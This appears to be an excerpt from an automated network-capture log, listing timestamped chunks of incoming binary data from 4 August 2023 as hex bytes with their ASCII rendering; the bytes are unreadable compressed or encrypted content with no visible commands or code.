                                                                                      2023-08-04 16:48:40 UTC2354INData Raw: 93 04 b9 79 5a 61 33 06 d5 5f bc db 81 b1 13 92 d5 2f 63 89 2f b0 41 f3 54 38 fa 2f b9 f6 27 b8 6a b0 f6 70 82 a7 8f 42 0b 4d 19 98 60 6c 04 58 95 d9 31 40 62 f4 e0 ae af e8 01 a0 ed 95 1d 37 56 1f 40 13 5d e9 be 21 eb 96 fc 8b ac 18 48 40 57 b5 99 be 0e 63 5d 86 8f c2 fa e2 8f c3 d3 e5 86 c6 76 e6 c8 15 33 fd 6d 4e 10 1f 0f 0f 88 39 93 cf 3e 3f 28 1c 00 a5 f8 17 26 50 18 30 a9 cd 0d 0d 5d 53 6a 48 d9 59 1e 31 32 de 9b 9d 1b d3 c5 a8 2a f2 71 4c 84 ab 58 ff 26 ca 2a ac 20 1e c7 84 86 aa 29 e0 86 1c 41 0e 3b 77 b2 15 e3 40 53 9b 11 4c e2 05 3b ce 1d e4 d9 29 07 3c ad a1 b2 47 d8 a1 65 62 d1 8d 7a f1 0f a4 61 6c fb d6 a9 a5 a5 bc 2b f5 1e c3 4a 33 ae fe 6f 3f 02 92 2c 23 8d 41 c6 8a eb 12 03 06 b3 ac c6 4b 08 12 08 4b 63 c1 d1 b6 22 13 96 c1 97 7d fb be 36
                                                                                      Data Ascii: yZa3_/c/AT8/'jpBM`lX1@b7V@]!H@Wc]v3mN9>?(&P0]SjHY12*qLX&* )A;w@SL;)<Gebzal+J3o?,#AKKc"}6
                                                                                      2023-08-04 16:48:40 UTC2358INData Raw: 00 45 67 8f 7b 31 25 51 d6 b9 ca b4 6d ba f1 82 c2 2c 3e f0 db 53 d9 a5 6c 6f ed 43 63 f1 9d b0 9a da cf 6a 1f 46 21 ea 70 07 35 87 d5 9d 62 9a cc 01 d0 25 42 71 12 95 11 3f 73 42 48 ca cf 01 b7 08 f8 4c 0e b7 95 31 0a 7f c4 45 28 d0 7a 52 da ad 1d 88 b3 e6 31 2a 9d 59 6b 36 40 0f ff c6 e5 7a 9e da f1 3d 11 22 d7 f0 4a 94 37 49 f3 ab e1 63 3a 1b d3 1f 0d 36 38 0f 5a 84 70 42 90 83 24 ab 06 95 e7 0c 35 dc b3 8d 09 bf 20 42 2e ac b4 53 67 1a ca 9f eb 08 61 a3 00 42 19 e7 33 70 a8 7f 7a fb e8 41 c9 05 c9 3b b9 be c1 b5 f2 0e 27 11 15 5c 32 3a 02 df 25 79 88 39 57 1e f3 4b 16 ac c3 ff 38 62 bc 83 dd ef f3 07 38 86 7a 2f 70 88 80 f5 45 2a 38 de 83 09 f8 5a 01 b2 c4 68 a9 a8 b0 ed 4c 43 45 44 ae ea 70 aa 34 01 49 9a 17 99 f5 d1 7b 16 e8 19 3a 04 8f bf 83 e3 b1
                                                                                      Data Ascii: Eg{1%Qm,>SloCcjF!p5b%Bq?sBHL1E(zR1*Yk6@z="J7Ic:68ZpB$5 B.SgaB3pzA;'\2:%y9WK8b8z/pE*8ZhLCEDp4I{:
                                                                                      2023-08-04 16:48:40 UTC2362INData Raw: 87 06 c6 23 4c 8a c6 6d 82 4b 86 a8 af 34 ed 3f 7b 41 2a 60 b9 94 b5 bb 80 d8 28 5d 39 de 31 c4 df 75 5a 6c ec 0a 98 ba 38 85 40 2f ba 62 2c 74 55 06 e1 99 e9 3a eb c7 10 0e 01 10 b3 19 33 f3 e4 8e c2 f3 1d f9 de 1b 70 ce be 16 c9 81 52 8e 94 82 4b 8c e9 16 ad 47 b6 93 5c 93 6c 49 39 d5 13 5d b7 e7 d2 47 9e 00 13 e2 41 a9 a5 4a 22 25 01 41 87 25 92 e3 e7 2b d5 2e e7 cc a4 3c 85 b8 f4 5b a5 e5 2d e2 94 42 0a 3b 61 21 18 ad 23 cc bc cc 63 46 dc 39 14 dc 62 fa 26 64 57 9c 30 21 40 18 8c 5a fb dc dc f3 c8 c7 a2 25 3e d9 41 d8 bd b8 0e 37 4a 24 c5 1b a2 7d d8 9d b1 c9 b2 56 c3 ae 47 53 33 6e 33 5d e3 d5 c0 00 87 57 2d 45 e7 63 a2 d2 0f 97 d1 34 57 e6 e9 f4 24 8f c8 6a 19 0e bf a2 25 1a 6e 9b 16 0c 7b 3c 89 aa 82 ae 87 fa b7 f0 8b 57 ee 52 b1 75 db 56 e6 97 8d
                                                                                      Data Ascii: #LmK4?{A*`(]91uZl8@/b,tU:3pRKG\lI9]GAJ"%A%+.<[-B;a!#cF9b&dW0!@Z%>A7J$}VGS3n3]W-Ec4W$j%n{<WRuV
                                                                                      2023-08-04 16:48:40 UTC2366INData Raw: d5 17 87 3e e4 af 70 c6 fd 92 67 74 8b 92 d5 af 6d 25 84 38 bc 76 4e 9c 6a 83 5a 46 50 d5 b0 1c 70 d5 f3 5b 24 6b 5c fa 0c 83 e2 2b cb 42 32 1f 10 ba 5b 64 f1 b1 07 70 61 a2 85 78 23 6e e4 27 75 cf 11 aa ff 3d 2c 4c c3 bf e7 2c 85 e5 77 c9 7b a8 77 16 5d c3 36 45 9e 2d 80 c3 ba 1e 5c 4f ed f8 b0 4e b4 94 6f c6 21 43 ad 2e b0 e7 52 9a 4d 46 20 3a a6 a4 13 aa 15 1e 20 80 8b 57 30 f6 7b 01 22 63 4d bf 10 a9 05 1c f2 31 80 57 d0 bb f1 58 9c 6a b9 de a9 39 ef de b6 76 7f d6 a4 89 6f f3 a6 9a 81 54 f8 ab 86 d7 a5 00 e5 c6 66 03 67 41 1f f1 b4 07 fa 1f 94 e8 b9 39 f0 12 8a cd cc bf ba ec c6 52 0b fd e1 9f 0d ea 4b 44 92 cd b9 3f 9e f9 3e 3d 53 4e 3e f1 79 ab 44 1c 2c a0 a6 79 08 67 6c ec d0 eb 21 1c cd 98 34 1b 28 3c df ba 94 07 b8 91 8e 96 37 d9 77 ed b9 65 13
                                                                                      Data Ascii: >pgtm%8vNjZFPp[$k\+B2[dpax#n'u=,L,w{w]6E-\ONo!C.RMF : W0{"cM1WXj9voTfgA9RKD?>=SN>yD,ygl!4(<7we
                                                                                      2023-08-04 16:48:40 UTC2370INData Raw: bb 60 af 78 8f c3 a6 14 85 62 5c 8d 20 f1 90 b1 36 00 57 fa 75 60 79 8f b7 3a d3 ea 65 1e 50 06 66 ec 1e 8a af 31 22 7c 2d 42 4a 61 9e 66 40 94 ae d8 a5 38 40 01 87 d4 5d 15 be de e8 44 0b 67 a9 33 2d a2 47 21 1d 5c 7b 42 4c 35 78 12 dc 2d 60 85 30 a9 87 45 af 05 21 7f 15 22 f1 41 86 6a 70 67 85 2d 01 e9 c0 e6 b5 6e ba fe 19 22 e8 e0 5d 51 d3 3f f6 35 c5 4a 7b 16 c7 ce 38 29 0e 20 75 58 43 d2 77 ac 27 42 68 17 01 22 28 25 e2 e2 7e 77 13 ae ae 41 97 aa 7d fb ff 3f f3 ed 89 de 25 fa 33 bf 55 19 58 a1 f6 54 3c 9c 58 26 3f 96 3b 5f 90 69 0b af 79 4f 68 8f 02 67 a9 73 50 0c 62 51 98 5e 9c 24 68 03 a3 90 b0 0c e1 63 01 58 89 37 29 cc 37 ea 5d cd f6 a8 9f 64 c1 fd 83 73 22 f2 08 57 1d d5 1e 0b 67 08 d7 9d e4 6c be d2 ff 38 45 e3 7b 36 2c 40 aa 0a b8 f0 db d8 cf
                                                                                      Data Ascii: `xb\ 6Wu`y:ePf1"|-BJaf@8@]Dg3-G!\{BL5x-`0E!"Ajpg-n"]Q?5J{8) uXCw'Bh"(%~wA}?%3UXT<X&?;_iyOhgsPbQ^$hcX7)7]ds"Wgl8E{6,@
                                                                                      2023-08-04 16:48:40 UTC2374INData Raw: 08 92 58 6b c7 ea 5a 66 b9 1d 40 d0 d7 e1 3e d2 6c 3b f9 95 38 1d 66 6e 27 c9 b5 38 2b 3b c9 37 d1 b9 f0 a2 ba 1d 3c 70 20 5f cb 72 b2 43 8e 0d f6 fc c3 43 64 95 35 14 f3 59 a1 41 3f 5f ea fe 47 ba c1 06 a9 ef fa a3 3f 5d dd d8 bf 9c 76 d0 4c 39 c7 ea 44 a9 9a 17 3e fd 26 67 50 5e 7e aa cd af a0 27 2f aa 73 0b f3 1b 11 1a 77 de f6 ec 1c e3 3f 69 72 76 6f b5 2b de 29 97 b4 ed a3 23 dc d7 b0 66 0c 35 75 8c af 6c 48 c9 cb 9f 46 f8 95 07 dc b8 6f 70 3b d2 30 6a c1 72 ee b8 b4 9c b4 b2 ae 4c 08 fb c3 82 a9 91 5a 72 3e 17 41 b7 b5 ef 08 5c c6 f5 69 f1 86 85 fd 95 ac fb 3b 82 a0 9c 93 b2 9f 02 77 78 f7 a9 c9 18 a1 16 1c cd 82 34 2d b7 51 3f 4f 4a 5d a0 cc fb 5d e0 ac d7 5e 6e 2d 10 b3 34 8d 24 d7 a7 bf b6 ae 42 5f 4e 10 da 3a 07 54 c4 d6 f0 ae a2 ed d2 64 31 a4
                                                                                      Data Ascii: XkZf@>l;8fn'8+;7<p _rCCd5YA?_G?]vL9D>&gP^~'/sw?irvo+)#f5ulHFop;0jrLZr>A\i;wx4-Q?OJ]]^n-4$B_N:Td1
                                                                                      2023-08-04 16:48:40 UTC2378INData Raw: 8e da eb c0 b8 c1 44 e3 0a d8 91 5e 2d 10 dc a1 2e 9d 8a 94 2b fa bc 3a 61 6f df 0e 8e 54 0b 33 a8 02 06 e4 d6 46 00 02 fd 6b 26 d3 ca c7 03 83 6a a0 c5 dd 4b 3f bf c2 f7 22 2b 50 bc 99 42 0d 01 7e 49 ba 3f 7b b9 92 aa 9b 32 c3 8e 4e 3e f4 b4 84 b5 1b 3f eb 65 3f 8f 42 5d f7 36 67 97 44 e5 3c db c3 83 6f 1f 29 27 57 96 3b b1 10 be 93 bb 2c c6 44 0f 4b 91 19 bc 2a 18 6a 08 91 e6 ed 8e 4d 51 af 9a a3 ec 39 52 32 a8 b7 98 15 d4 f4 3c 52 3c a5 d8 c7 66 7a 9c 03 fc b1 af c4 37 8d fe c5 a0 8d d5 dc b7 40 fe 4f e1 87 8f 0b 14 3d 4f a2 74 44 08 ac a2 67 10 d9 47 a0 db 2e 5c 5b 20 a0 84 0e eb 0f 42 8f d0 83 68 d7 fa 0a 0b e6 55 7e 31 51 11 45 a5 26 04 20 35 33 f7 9b 5c 3b ba 4a 67 48 51 04 7b 23 ec f3 a1 40 5f 58 ad f1 6c db b7 bd 62 4c 7c ff 14 39 8e 92 a5 c2 b3
                                                                                      Data Ascii: D^-.+:aoT3Fk&jK?"+PB~I?{2N>?e?B]6gD<o)'W;,DK*jMQ9R2<R<fz7@O=OtDgG.\[ BhU~1QE& 53\;JgHQ{#@_XlbL|9
                                                                                      2023-08-04 16:48:40 UTC2382INData Raw: ae 44 80 f7 8e 8a f3 d2 5c 2a 87 7c 97 06 1c 38 43 54 b6 07 fd 8e b4 9a 25 2d e6 56 78 f1 bf 67 ad 90 f8 4b b2 35 fc a9 18 c7 91 95 01 00 22 db 58 3e f4 16 24 70 ad b4 39 9d bd 05 bc 28 ba ee e3 a1 bb 43 6b f8 82 5e 16 9a 89 c9 3b f0 94 b9 a2 6d c4 ae f9 ca 97 f5 29 16 af f3 10 3a d8 39 3b 8f 4c fd b2 28 a7 42 8a fa 69 03 61 50 80 91 f6 19 13 42 54 92 de 79 5c e0 ec ce f6 25 ea fe 30 ee 02 a4 e9 87 2d c1 8c f3 3a 49 ad ba 03 ef 1c 54 67 51 d1 7b a3 a6 d1 31 df 96 99 7d d2 3c 71 4a 85 70 17 eb 8f f7 95 1a 11 79 12 74 a5 bb 7b 22 2a b6 14 13 36 c7 55 27 7d 03 8f c7 a5 bb cc 06 08 d3 b6 c8 ca 9c b9 86 5e b2 7a de de 50 17 47 33 9e 3a 53 b3 32 ee 7a d2 db fc 6b 3d 19 70 ec 35 2c 01 1f f8 7c 68 41 79 39 9a a1 5a 8b 2a c6 15 ea d3 98 54 95 c9 c9 46 bc 5e 21 a5
                                                                                      Data Ascii: D\*|8CT%-VxgK5"X>$p9(Ck^;m):9;L(BiaPBTy\%0-:ITgQ{1}<qJpyt{"*6U'}^zPG3:S2zk=p5,|hAy9Z*TF^!
                                                                                      2023-08-04 16:48:40 UTC2386INData Raw: 36 b6 b9 7f 41 51 d0 47 64 92 e6 ca 4d 16 d2 88 aa 7a fd 38 dc 4e 29 2a d7 6f 69 cc d3 1c 88 28 c5 e7 cf 4c b8 ac 1c f8 47 3f 8a c7 73 4a 4d 07 13 ca 43 db 76 e1 40 ef 34 75 8f cd 94 b8 b5 f6 e6 49 8b 19 50 e0 a1 98 52 f0 ee 89 34 51 28 35 38 ed 58 5a 0b 43 84 0b 72 3f 2f ff 29 90 d7 46 51 1c 6b eb 03 58 9b fc 6b ce d2 08 0e 9e 5d 3f f2 fd 2e 96 7a d3 c9 26 3b f3 6c 93 7a 3e 0d 0a d8 a2 6e 13 8d 41 cf 5a fe a5 5a b2 e3 af 79 6b 74 be 58 0d 12 a1 19 b1 34 23 be 95 26 b7 09 68 bc 20 1c 45 de af 7f 7d be c4 c8 cc af dd 53 0a 84 e0 4a 9b 44 b7 78 62 1f b2 c5 1e 41 32 f6 84 97 03 fc 95 3b 20 78 45 82 eb 05 6f 06 fc 68 b3 75 29 82 a6 0c 3e f1 0b 92 31 8f 52 dd 1f de c3 e4 c6 9f 63 64 ca bc 58 a5 6b b6 3e e2 98 64 83 b1 a1 4a 3e c1 ef 6e 57 8f 34 33 43 ea e1 5b
                                                                                      Data Ascii: 6AQGdMz8N)*oi(LG?sJMCv@4uIPR4Q(58XZCr?/)FQkXk]?.z&;lz>nAZZyktX4#&h E}SJDxbA2; xEohu)>1RcdXk>dJ>nW43C[
                                                                                      2023-08-04 16:48:40 UTC2390INData Raw: ab e4 f5 9d 8a 17 3a d7 cf 25 36 6b cc fb 05 b9 98 27 57 32 27 01 64 ba f9 a2 8a ea df 40 b9 2c a6 46 a1 60 f3 01 16 92 59 4c a4 f8 8b 27 ae 2d 45 29 8b d9 12 81 f4 41 12 ac 42 ec e8 e5 e7 8d 8b 01 bf d3 66 c3 73 44 fa 1e 2b 9c 31 f4 98 2b ec d1 4b d1 6e b9 01 db d0 d2 30 ac 0b 42 22 a9 9d 28 59 a1 be 1f 33 f0 d6 b5 66 5a 99 4e 44 7b 4a 4f 96 ad 4c af fa 4c 60 af ba 02 28 ef 4d 61 43 a9 93 00 cd 6e 36 63 c5 6a 6e 0c 2d 0e 5f 30 1b 6f 59 b0 69 fd a1 f7 e0 03 5c 6b 91 b5 7c 69 9a 48 26 67 82 0c 71 fb 8d 9f c2 94 7c ea e2 53 91 e2 cf a1 d6 92 82 9c e6 61 1b ac 52 03 68 aa 5b 6f 1f b2 97 aa c9 32 d3 32 d1 41 0b 5a 33 e3 22 e7 3f 71 ab 93 d9 35 2c 97 11 ef 2d 57 c5 b1 01 ac ed d8 49 3c 8a cf 05 10 02 f1 54 d5 a5 19 ff 7e 46 7e f2 37 5c 55 d0 ad 48 e7 81 a8 f9
                                                                                      Data Ascii: :%6k'W2'd@,F`YL'-E)ABfsD+1+Kn0B"(Y3fZND{JOLL`(MaCn6cjn-_0oYi\k|iH&gq|SaRh[o22AZ3"?q5,-WI<T~F~7\UH
                                                                                      2023-08-04 16:48:40 UTC2394INData Raw: 45 c2 43 bc b8 9e f5 48 fe 7d 68 eb 21 ab 24 e4 c9 e4 bc 26 f4 0e c0 ca fb e1 26 d2 a1 17 b3 48 bb eb e0 f1 c4 6f bf fa d8 ed 02 a2 80 c6 20 1f 99 17 32 b9 5e 8e 9b 92 fd 8b 0b e9 5a 3a 15 73 b9 20 53 69 d9 2b 61 82 cb 46 44 ab 34 c9 2e 2e 1d 97 02 50 68 27 7e b1 54 de f9 f9 a9 8a 18 f9 23 e4 bf d1 82 2b ba 04 36 c8 26 55 ef 2d 76 1b ca 8e 03 c3 d3 c4 ee 20 39 d5 34 4e 10 ba 87 d8 6b cf 3d 81 cb 84 a0 c3 8a 5c a8 2e 85 94 fd ff 75 f4 79 54 ce 51 00 06 4d b8 de d1 77 db a8 44 fe 70 76 05 bc 24 57 87 5d 83 15 cb 4e ce f6 8f b1 b3 3d 16 30 87 7b 7e 92 6f ca ed 77 88 05 9b 7b 67 b9 9a ea 80 9e 3a b6 a5 1a cf 94 98 fb da ba 4f 62 b8 97 d0 78 16 8d e5 ca c0 47 b8 47 f2 e6 ac d0 d5 e4 95 e0 a1 4a f8 9b 08 13 f5 cb 46 b7 75 78 d2 33 b2 94 f5 13 1f 20 f7 33 16 b4
                                                                                      Data Ascii: ECH}h!$&&Ho 2^Z:s Si+aFD4..Ph'~T#+6&U-v 94Nk=\.uyTQMwDpv$W]N=0{~ow{g:ObxGGJFux3 3
                                                                                      2023-08-04 16:48:40 UTC2398INData Raw: 89 c9 c6 d2 97 cd ea 52 61 3a b0 60 65 e2 d0 e9 ef 75 51 e6 57 53 07 7d 8c 34 32 89 16 aa 02 6d 25 11 f7 13 a4 2a c2 b3 9e f6 47 a5 eb 14 99 31 04 49 7b 5a 10 32 b7 bc 36 90 ad ef 35 21 f4 dc 51 18 fa 22 79 93 81 ac 55 4b 85 cf 52 87 5d 3c 1c 4a bb 5f 04 01 43 44 ae 0a d3 f2 3a 36 1b 3e fe 9b a0 a1 33 08 08 29 ec e9 19 c7 b8 fa f3 49 c2 75 9f 68 c3 10 ab 93 de b2 93 f0 33 20 7c ea 0d a5 a5 e3 32 d6 78 f0 a4 21 78 28 35 ce 15 e3 bd 7d aa bb fe 16 94 bf b8 dd d8 a4 fe eb ff 73 19 bc 1a 1e e5 2d e7 66 d4 98 ee 25 47 4d 58 3a 24 fd 07 16 0a ad 85 3a eb 7e 63 8b 31 1a bd 83 a4 c6 2c 06 15 4b 53 56 9b 3c f7 0e f7 12 0e 43 f1 97 44 79 fb a0 32 7c b4 c7 40 80 d3 cc 23 23 85 34 a7 94 85 99 76 61 3e 19 5c 34 85 ca a1 42 49 e4 eb 78 da 56 4f 17 73 b0 80 7a 2b 23 e9
                                                                                      Data Ascii: Ra:`euQWS}42m%*G1I{Z265!Q"yUKR]<J_CD:6>3)Iuh3 |2x!x(5}s-f%GMX:$:~c1,KSV<CDy2|@##4va>\4BIxVOsz+#
                                                                                      2023-08-04 16:48:40 UTC2402INData Raw: 1a f8 0e db d4 e4 2d b8 52 9d c7 99 f0 e2 a8 02 2d 88 aa 0c 51 ff 03 88 e7 36 5e e9 c9 06 7d 64 28 7d f6 19 94 be 38 0c be 15 75 19 25 df b4 22 93 6f 5a 25 f2 37 e2 72 de 2d c7 f1 9a cb ae a4 0a 4b 57 a7 91 09 4a ef a7 bc d4 b9 a6 14 04 4d 35 7b 06 aa b6 bb 91 96 cb 0a 42 7f 09 c5 af 33 4c 9a a3 80 df ee e9 ad ab 44 e1 c7 5a 1c 24 b7 2b a1 8e 8b 4f c6 82 2a 13 e8 b2 65 87 06 9b 63 51 c6 cf 8a 20 50 35 eb a9 4d a7 c3 69 cb 9d 81 e5 c4 c3 9e 01 c8 62 3d d6 30 fe df c8 83 77 26 1c c2 e2 ca 3d 46 de 14 54 b4 dd 6a 9c 1b 62 42 f2 a1 e9 38 53 bd 48 b8 db 1b 31 3f 05 d0 ac 48 1b 41 4f 01 d5 57 5b 43 fe ba b3 fb 9e 2d 86 c3 a4 53 a9 5b 72 b4 6f 0f 74 8b 33 a2 ef 6b 2e 06 3e 35 af 49 62 48 c6 d8 2c 2a 18 0a ce 21 86 36 f0 ea 1d 38 09 75 cf 9b 75 26 89 21 8a 17 0c
                                                                                      Data Ascii: -R-Q6^}d(}8u%"oZ%7r-KWJM5{B3LDZ$+O*ecQ P5Mib=0w&=FTjbB8SH1?HAOW[C-S[rot3k.>5IbH,*!68uu&!
                                                                                      2023-08-04 16:48:40 UTC2406INData Raw: 1c 95 4d 67 07 52 74 13 d5 36 40 bd 78 c5 b0 43 f9 c3 02 c5 e9 73 e1 8a 21 b3 ab e0 df 91 38 f8 69 f9 0f f8 21 a8 7c 36 f6 0d 18 92 1d 20 a3 c8 7f 9a bf 1e 51 6d bd 8b c6 79 3a cd d2 0c 1a 4a 97 4b 92 e5 83 ff 63 86 5d b2 42 aa 16 5e eb 5e f5 89 f1 26 67 a7 ac 71 a0 59 83 b2 9d 05 35 86 3b 8c 12 b9 b9 61 44 9c 1f bf 70 8f df e1 11 c4 97 2d f0 19 68 5d 78 5b 09 ac 43 3a 56 75 7a af 6b 54 a4 aa c0 03 37 33 83 80 34 b3 af 57 26 6a 6f 26 a0 f6 eb 93 cc 87 fd 7b cb 1f 32 16 71 1c 84 89 91 71 21 40 95 8d ff 75 43 cd 1c 01 be 46 76 b4 b3 ba f6 b5 e5 b5 95 f7 e4 5b a7 20 b6 ae 6d e9 43 1e 12 61 78 8e 4b de e3 54 0a e7 b1 0e 9c b4 67 b1 9b 41 45 7a 1c 91 a4 e8 60 e5 4f 55 39 e5 42 0c 6f c7 62 b1 79 01 b0 82 ad cc 93 e7 40 c4 1c 8d 52 0e 2c 11 b6 47 0f 8c e8 c5 02
                                                                                      Data Ascii: MgRt6@xCs!8i!|6 Qmy:JKc]B^^&gqY5;aDp-h]x[C:VuzkT734W&jo&{2qq!@uCFv[ mCaxKTgAEz`OU9Boby@R,G
                                                                                      2023-08-04 16:48:40 UTC2410INData Raw: 0f 52 bc f2 7b d5 44 70 af e3 c8 7a b5 9f f6 d8 11 3c f2 7d b7 33 5f e2 e6 bc d6 02 a0 11 80 cd 10 4b ff 2b 38 f4 4a c0 b8 1f af 55 f7 ad 63 4c 0e 0a 09 7f 1d 0d 6c 56 7b 34 c0 d1 8e 99 36 33 2e 10 04 e8 07 6a ce 85 03 55 59 6c 53 fa 1e a8 1d bc 9e 57 82 ca c6 7a 81 e1 65 1a c1 a6 b4 66 b9 39 08 80 70 3a 86 48 59 db bb bc d2 2f 4e 7d 07 0d 73 48 a1 42 d9 89 dc 4c b6 14 c4 30 1f bb 88 09 61 91 68 b1 1d 69 3c 5b ec a3 c9 85 21 20 0c 47 2e 8f 1d 06 34 ba 59 30 9c aa 5f ca 68 ce fc 31 cd 1f b4 50 a9 5c 2d 55 75 7c 3b 75 b2 a2 47 b9 00 8e 29 d5 f0 96 a3 71 2d 92 32 a8 5d e5 4a 45 13 37 09 c9 98 6b 56 45 91 27 22 c9 18 a9 ed a1 fb 93 d0 94 9f 04 a7 ce ab 0f 0b 6f 8e fa e2 4f 36 37 d6 42 08 31 9c be b0 79 15 e1 fc 82 fe b6 9e f0 b7 03 d0 f7 94 a3 4a 63 ea a0 98
                                                                                      Data Ascii: R{Dpz<}3_K+8JUcLlV{463.jUYlSWzef9p:HY/N}sHBL0ahi<[! G.4Y0_h1P\-Uu|;uG)q-2]JE7kVE'"oO67B1yJc
                                                                                      2023-08-04 16:48:40 UTC2414INData Raw: 6a 3d 9c 9b 16 e0 68 a1 fb f7 06 35 c5 b3 9f 43 2d 73 06 ed 2b db 8a bb ba 4a 0a 55 ad 65 f1 53 12 9d 21 4e 9f b3 7b 2f 8f 71 8e c0 1d 9d c7 77 09 62 0e 9a 8e 1f c1 ea 82 a3 97 01 cf 24 e9 3b 7e af 6d 5e b0 5d 68 cc d4 f6 44 be 3d 09 d0 51 c1 4b 90 52 d5 97 0a 9d 18 04 59 65 65 1d 52 9c 79 a1 04 53 70 ad 94 b6 85 63 0f 7c 7c dc 4d a7 ac fb 74 5c df 77 37 77 e6 44 8c c1 e3 b9 8e a0 13 e0 ca aa b4 61 9a 56 f8 a0 75 aa a9 29 98 7c 6a 97 aa d7 13 59 96 f0 68 f3 7b 9d c1 03 71 45 4b 83 50 3b 11 4a 7c f4 a8 b7 cc 32 4e 41 54 f4 0a a0 54 b1 16 96 8d 95 5b 4b 80 89 13 cc ab fa 87 dc d9 69 3b c3 5c a0 7f 2c 8b c2 80 af 28 a1 41 16 d3 46 d9 0c c2 04 c3 68 63 1e 68 52 ba 17 b7 a7 45 43 6d 76 66 dd a7 64 10 34 be b9 ea 13 a3 ea c5 ae d9 d9 7b 11 68 88 7a f4 6d 97 95
                                                                                      Data Ascii: j=h5C-s+JUeS!N{/qwb$;~m^]hD=QKRYeeRySpc||Mt\w7wDaVu)|jYh{qEKP;J|2NATT[Ki;\,(AFhchRECmvfd4{hzm
                                                                                      2023-08-04 16:48:40 UTC2418INData Raw: fd ed d4 b7 61 a1 81 9f a9 0f 5c 2b 83 f1 d5 8e f2 1c d2 3a a2 af 36 86 5b 7c d6 1a 0b 0e f0 b2 bc 41 93 57 29 2f ed b5 fe d6 53 56 87 0e 6e b1 18 35 bd 8d 02 49 90 a3 51 ab 09 68 2e fd fc 82 36 2d 32 29 ba 0c 01 60 53 11 d8 27 c5 4a 39 78 05 b1 b4 62 f3 a9 84 89 cd 2d 49 d2 f9 d1 c9 9f fb 0c d6 d7 0f da a9 48 9e 13 bc 62 93 d7 57 a6 ef 9e a2 2e af a7 62 7c 76 e0 75 f0 45 49 a6 e8 da 44 7d 33 75 84 18 46 c4 c4 d2 a1 41 3d db 8b 4c e8 58 f3 88 c9 ab 91 64 5c 01 9c a7 b5 4a 9e 40 6b 07 6f b5 68 a6 de f1 0b 45 d9 4a 0b 5d 20 68 a5 16 f3 3e 97 8a c0 fa 72 05 49 17 ed 58 3f 15 37 a3 50 b9 e8 22 64 f6 c2 c8 62 d2 da 19 74 bf 1b 20 97 a6 66 64 d9 6f 9c e4 91 2b 4a 98 72 46 ad 64 b1 bd 16 95 98 9c 39 09 74 c1 b8 30 02 e1 a7 71 a9 13 cd 5d 60 99 8a 12 c0 82 e1 d2
                                                                                      Data Ascii: a\+:6[|AW)/SVn5IQh.6-2)`S'J9xb-IHbW.b|vuEID}3uFA=LXd\J@kohEJ] h>rIX?7P"dbt fdo+JrFd9t0q]`
                                                                                      2023-08-04 16:48:40 UTC2422INData Raw: ae 85 4b 85 29 f7 d9 62 ec 7e 08 03 a4 88 da 11 b7 eb d6 95 47 5c 9d bb ef 9b 94 19 6e 4b 72 38 56 8e 4e 31 28 84 47 41 a6 36 a4 de 67 ff 2e 37 cd 88 db 39 69 b0 db ad f6 e4 97 15 f3 1e c3 70 8b 1e fd d2 a1 2a 5d 6e 67 9e e6 13 82 dd 9f 3b 4d 9b 9b f1 8d 58 f3 e1 00 20 bc ca 52 4d 80 e0 b6 af e6 39 af af d8 da 2e 77 ef 35 07 b7 6e d0 da d0 ec 40 39 8f 54 73 3e b4 27 76 59 b1 2b 9e ac d9 9d 84 54 ba da 5f 6a ae 19 28 9e ce 2a 08 7d 66 18 75 a7 12 ac 10 30 52 e0 34 9a f3 a9 9d 68 8b 77 a3 15 94 e3 d5 1e d4 b3 6b 9e 53 1c c3 c9 05 11 fb b9 5a 7c b3 b2 76 6e d8 39 ef 96 ca e2 75 ae e3 b6 17 8f ac 33 95 ee a1 27 3a d3 b8 71 b8 de 89 02 02 08 c8 46 c6 b2 35 3c df f6 53 0d 2f 30 60 1e d2 bc 3b b4 a9 30 2b 5c e8 f9 9f af f0 0b cf 37 cd 4f d8 8d ab 93 37 0c 3f 33
                                                                                      Data Ascii: K)b~G\nKr8VN1(GA6g.79ip*]ng;MX RM9.w5n@9Ts>'vY+T_j(*}fu0R4hwkSZ|vn9u3':qF5<S/0`;0+\7O7?3
                                                                                      2023-08-04 16:48:40 UTC2426INData Raw: 3d e3 c7 92 d1 1b fb ad 55 59 e5 4e 0b 4e 01 54 55 70 26 6e 7b dc 25 94 7f fb 81 8d 66 61 af 64 15 23 3b de cf 5b cf 19 10 37 35 c4 46 f4 77 6d f2 b4 98 55 ce c2 98 0a a1 34 06 41 1c 95 fc 7e 0a 96 cc 38 f6 1f a3 89 e0 0c 13 0e 3f 72 b7 43 83 03 26 ba bc e2 32 4c f4 e4 d1 45 06 a8 bb 5d e9 69 a4 eb 90 30 69 d8 3b 71 8c 0e 89 64 5b 05 4e e0 4c 4f ca f3 75 1e fd 2a 5a 16 0a dd c5 b6 09 88 82 44 eb 69 9e 2f c9 79 f0 b5 07 1b f6 b8 b9 e2 73 f9 f9 4e b2 47 73 2d e3 a7 55 3c 02 25 57 2e 05 a4 cc c5 1d d1 37 78 8d e3 18 20 e2 0b aa a5 3a 67 f0 27 3e fe 97 29 34 97 ae 18 32 e6 07 ba c7 59 b8 f7 93 ba 61 66 d3 42 ba fc 50 8f da 30 9d 9e 38 74 95 31 b9 45 da 4a 2e 41 98 0e 0f 92 40 b9 2f d5 31 f9 c3 82 aa e3 09 e3 27 59 16 96 94 97 8e 63 e5 94 21 b2 17 6b bf 43 33
                                                                                      Data Ascii: =UYNNTUp&n{%fad#;[75FwmU4A~8?rC&2LE]i0i;qd[NLOu*ZDi/ysNGs-U<%W.7x :g'>)42YafBP08t1EJ.A@/1'Yc!kC3
                                                                                      2023-08-04 16:48:40 UTC2430INData Raw: 1b 20 af 8b 7b a0 63 2a 9b 54 af 3e d0 d8 52 1c 01 6b 3c 2d 6e b6 29 54 2e ae ab db 30 b6 d5 54 ca e9 01 00 da a9 16 ab 4d bb b9 90 b7 58 ea 2c b4 06 77 70 93 ab 26 f7 38 12 5e c4 a0 1b ce 3c 6d 89 b6 ac bc 6d 8a 80 4b 7e a1 dd 72 18 aa 76 b1 23 24 3c d9 f3 9c b8 e4 42 55 f0 a0 ee fb b4 72 eb eb 3d 99 0c 7b 41 12 56 22 ce 55 44 18 69 58 18 8a c9 b5 b9 12 85 61 67 89 5e e4 0b aa a8 07 10 c1 65 09 45 16 c9 03 4c 05 b5 ae 96 4f 90 12 17 34 ba 2f 24 67 e5 71 fe 4b 06 cc e9 8e 92 b1 9e 91 62 e8 d1 42 70 4c ba ce d9 b5 61 26 7c 49 2c 85 3a ae d2 d7 ef 58 f2 ba 9d ad 62 72 ee 74 86 5c 31 80 88 5a a5 94 2b 5b 0a a6 87 ff 79 b6 